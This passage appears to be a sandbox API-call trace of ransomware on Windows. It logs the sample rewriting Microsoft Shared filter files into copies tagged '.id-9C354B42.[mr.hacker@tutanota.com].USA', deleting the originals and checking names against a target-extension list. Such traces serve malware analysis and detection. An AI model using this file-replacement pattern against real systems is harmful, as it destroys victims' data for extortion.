lpNumberOfBytesWritten=0x32bfc9c*=0x9780, lpOverlapped=0x0) returned 1 [0054.267] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.267] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.267] SetEndOfFile (hFile=0x174) returned 1 [0054.267] CloseHandle (hObject=0x174) returned 1 [0054.268] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.268] SetEndOfFile (hFile=0x218) returned 1 [0054.269] CloseHandle (hObject=0x218) returned 1 [0054.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.269] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1 [0054.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.269] lstrlenW (lpString=".doc") returned 4 [0054.269] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.269] lstrlenW (lpString=".docx") returned 5 [0054.269] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0054.269] lstrlenW (lpString=".pdf") returned 4 [0054.269] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.269] lstrlenW (lpString=".xls") returned 4 [0054.269] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.269] lstrlenW (lpString=".xlsx") returned 5 [0054.269] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0054.269] lstrlenW (lpString=".ppt") returned 4 [0054.269] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.269] lstrlenW (lpString=".zip") returned 4 [0054.269] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.269] lstrlenW (lpString=".rar") returned 4 [0054.269] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".bz2") returned 4 [0054.270] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.270] lstrlenW (lpString=".7z") returned 3 [0054.270] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString=".dbf") returned 4 [0054.270] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString=".1cd") returned 4 [0054.270] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString=".jpg") returned 4 [0054.270] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString=".doc") returned 4 [0054.270] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".docx") returned 5 [0054.270] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0054.270] lstrlenW (lpString=".pdf") returned 4 [0054.270] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".xls") returned 4 [0054.270] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".xlsx") returned 5 [0054.270] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0054.270] lstrlenW (lpString=".ppt") returned 4 [0054.270] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.270] lstrlenW (lpString=".zip") returned 4 [0054.270] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".rar") returned 4 [0054.270] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.270] lstrlenW (lpString=".bz2") returned 4 [0054.271] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.271] lstrlenW (lpString=".7z") returned 3 [0054.271] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.271] lstrlenW (lpString=".dbf") returned 4 [0054.271] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.271] lstrlenW (lpString=".1cd") returned 4 [0054.271] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0054.271] lstrlenW (lpString=".jpg") returned 4 [0054.271] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.271] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0054.271] lstrlenW (lpString="odffilt.dll") returned 11 [0054.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.272] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1312656) returned 1 [0054.272] CloseHandle (hObject=0x218) returned 1 [0054.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20 [0054.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.272] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.272] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.273] GetLastError () returned 0x0 [0054.273] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0054.295] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0054.690] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x407a0, lpOverlapped=0x0) returned 1 [0054.702] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x407b0, lpOverlapped=0x0) returned 1 [0054.708] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.708] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.708] SetEndOfFile (hFile=0x174) returned 1 [0054.709] CloseHandle (hObject=0x174) returned 1 [0054.709] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.709] SetEndOfFile (hFile=0x218) returned 1 [0054.712] CloseHandle (hObject=0x218) returned 1 [0054.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.712] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1 [0054.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.972] lstrlenW (lpString=".doc") returned 4 [0054.972] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString=".docx") returned 5 [0054.972] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0054.972] lstrlenW (lpString=".pdf") returned 4 [0054.972] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString=".xls") returned 4 [0054.972] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString=".xlsx") returned 5 [0054.972] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0054.972] lstrlenW (lpString=".ppt") returned 4 [0054.972] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.972] lstrlenW (lpString=".zip") returned 4 [0054.972] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString=".rar") returned 4 [0054.972] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.972] lstrlenW (lpString=".bz2") returned 4 [0054.972] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.972] lstrlenW (lpString=".7z") returned 3 [0054.973] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.973] lstrlenW (lpString=".dbf") returned 4 [0054.973] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.973] lstrlenW (lpString=".1cd") returned 4 [0054.973] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.973] lstrlenW (lpString=".jpg") returned 4 [0054.973] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.973] lstrlenW (lpString=".doc") returned 4 [0054.973] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.973] lstrlenW (lpString=".docx") returned 5 [0054.973] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0054.973] lstrlenW (lpString=".pdf") returned 4 [0054.973] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.973] lstrlenW (lpString=".xls") returned 4 [0054.973] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.973] lstrlenW (lpString=".xlsx") returned 5 [0054.973] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0054.973] lstrlenW (lpString=".ppt") returned 4 [0054.973] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.974] lstrlenW (lpString=".zip") returned 4 [0054.974] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.974] lstrlenW (lpString=".rar") returned 4 [0054.974] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.974] lstrlenW (lpString=".bz2") returned 4 [0054.974] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.974] lstrlenW (lpString=".7z") returned 3 [0054.974] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.974] lstrlenW (lpString=".dbf") returned 4 [0054.974] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.974] lstrlenW (lpString=".1cd") returned 4 [0054.974] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0054.974] lstrlenW (lpString=".jpg") returned 4 [0054.974] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.974] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0054.974] lstrlenW (lpString="JPEGIM32.FLT") returned 12 [0054.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.151] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=241024) returned 1 [0055.151] CloseHandle (hObject=0x21c) returned 1 [0055.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 0x20 [0055.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.152] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.152] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0055.152] GetLastError () returned 0x0 [0055.152] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x3ad80, lpOverlapped=0x0) returned 1 [0055.157] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x3ad90, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x3ad90, lpOverlapped=0x0) returned 1 [0055.160] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.160] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.161] SetEndOfFile (hFile=0x1f0) returned 1 [0055.161] CloseHandle (hObject=0x1f0) returned 1 [0055.161] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.161] SetEndOfFile (hFile=0x21c) returned 1 [0055.163] CloseHandle (hObject=0x21c) returned 1 [0055.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.163] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 1 [0055.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.163] lstrlenW (lpString=".doc") returned 4 [0055.163] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.164] lstrlenW (lpString=".docx") returned 5 [0055.164] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.164] lstrlenW (lpString=".pdf") returned 4 [0055.164] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString=".xls") returned 4 [0055.164] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString=".xlsx") returned 5 [0055.164] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.164] lstrlenW (lpString=".ppt") returned 4 [0055.164] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString=".zip") returned 4 [0055.164] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString=".rar") returned 4 [0055.164] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString=".bz2") returned 4 [0055.164] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.164] lstrlenW (lpString=".7z") returned 3 [0055.164] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString=".dbf") returned 4 [0055.164] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString=".1cd") returned 4 [0055.164] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString=".jpg") returned 4 [0055.164] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.164] lstrlenW (lpString=".doc") returned 4 [0055.164] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.164] lstrlenW (lpString=".docx") returned 5 [0055.164] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.165] lstrlenW (lpString=".pdf") returned 4 [0055.165] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.165] lstrlenW (lpString=".xls") returned 4 [0055.165] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.165] lstrlenW (lpString=".xlsx") returned 5 [0055.165] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.165] lstrlenW (lpString=".ppt") returned 4 [0055.165] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.165] lstrlenW (lpString=".zip") returned 4 [0055.165] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.165] lstrlenW (lpString=".rar") returned 4 [0055.165] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.165] lstrlenW (lpString=".bz2") returned 4 [0055.165] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.165] lstrlenW (lpString=".7z") returned 3 [0055.165] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.165] lstrlenW (lpString=".dbf") returned 4 [0055.165] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.165] lstrlenW (lpString=".1cd") returned 4 [0055.165] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.165] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0055.165] lstrlenW (lpString=".jpg") returned 4 [0055.165] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.165] lstrcmpiW (lpString1=".WPG", lpString2=".USA") returned 1 [0055.165] lstrlenW (lpString="MS.WPG") returned 6 [0055.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.166] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1382) returned 1 [0055.166] CloseHandle (hObject=0x21c) returned 1 [0055.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20 [0055.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.166] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.166] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0055.167] GetLastError () returned 0x0 [0055.167] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x566, lpOverlapped=0x0) returned 1 [0055.168] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x570, lpOverlapped=0x0) returned 1 [0055.169] ReadFile (in: hFile=0x21c, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.169] WriteFile (in: hFile=0x1f0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: 